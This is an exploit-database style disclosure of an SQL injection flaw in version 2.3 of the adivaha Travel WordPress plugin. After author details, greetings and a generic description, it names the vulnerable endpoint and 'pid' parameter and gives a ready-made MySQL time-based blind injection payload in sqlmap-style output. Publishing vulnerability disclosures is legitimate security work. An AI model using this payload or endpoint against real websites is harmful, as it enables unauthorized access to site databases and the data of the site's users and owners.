WordPress Adivaha Travel 2.3 SQL Injection

# Exploit Title: WordPress adivaha Travel Plugin 2.3 - SQL Injection# Exploit Author: CraCkEr# Date: 29/07/2023# Vendor: adivaha - Travel Tech Company# Vendor Homepage: https://www.adivaha.com/# Software Link: https://wordpress.org/plugins/adiaha-hotel/# Demo: https://www.adivaha.com/demo/adivaha-online/# Tested on: Windows 10 Pro# Impact: Database Access## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /mobile-app/v3/GET  parameter 'pid' is vulnerable to SQL Injectionhttps://website/mobile-app/v3/?pid=[SQLI]&isMobile=chatbot---Parameter: pid (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: pid=77A89299'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&isMobile=chatbot---[-] Done